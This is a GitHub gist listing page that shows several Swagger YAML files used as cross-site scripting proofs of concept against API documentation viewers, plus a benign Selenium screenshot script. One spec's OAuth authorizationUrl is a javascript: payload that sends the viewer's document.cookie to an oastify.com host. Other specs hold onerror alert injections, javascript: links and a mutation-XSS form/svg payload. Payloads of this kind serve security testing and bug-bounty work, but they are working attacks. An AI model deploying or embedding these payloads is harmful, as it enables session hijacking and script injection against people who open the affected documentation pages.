sh4nx0r
/ swaggerHit.yaml
Last active
June 28, 2024 13:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| securityDefinitions: | |
| a: | |
| type: oauth2 | |
| authorizationUrl: javascript:location.href='http://an1iwti6fonzqml5ihvwngy9f0lr9jx8.oastify.com?cookie='+document.cookie// | |
| info: | |
| version: "0.0.1 <img src='https://miro.medium.com/v2/resize:fit:743/1*N6OtdkXNnYYyDhaQkG8Ydg.jpeg'>" | |
| title: Resource Injection POC | |
| description: <h1>Iframe Injection</h1><img src="https://gist.githubusercontent.com/sh4nx0r/6654b12147010cef4261a52464cb596c/raw/28c842a80417139ad3af214581fd4d3d17544ec9/svgdos.svg" onerror=alert(1)> | |
| termsOfService: "javascript:alert(document.cookie)" |
sh4nx0r
/ svgdos.svg
Created
June 1, 2024 12:54
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
sh4nx0r
/ fullSwaggerTest.yaml
Created
May 22, 2024 11:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
sh4nx0r
/ webScreenshot.py
Created
May 8, 2024 13:21
Takes a website input and uses selenium driver to take the website snapshots (screenshot)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # You need to first check your chrome version. Open chrome browser and run chrome://version to find out the version and after that you can visit the https://googlechromelabs.github.io/chrome-for-testing/#stable to find the appropriate chromium drivers that is matching your chrome version. Download and extract the driver and give +x permission to the executable inside the extracted zip. | |
| from selenium import webdriver | |
| from selenium.webdriver.chrome.options import Options | |
| from selenium.webdriver.chrome.service import Service | |
| from PIL import Image | |
| import io | |
| def take_screenshot(url): | |
| # Validate and format URL |
sh4nx0r
/ iframe.yaml
Last active
June 26, 2024 11:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| securityDefinitions: | |
| a: | |
| type: oauth2 | |
| authorizationUrl: javascript:alert(document.domain)// | |
| info: | |
| version: "0.0.1" | |
| title: Resource Injection POC | |
| description: <h1>Iframe Injection</h1><img src="https://miro.medium.com/v2/resize:fit:743/1*N6OtdkXNnYYyDhaQkG8Ydg.jpeg" onerror=alert(1)> | |
| termsOfService: "javascript:alert(document.cookie)" |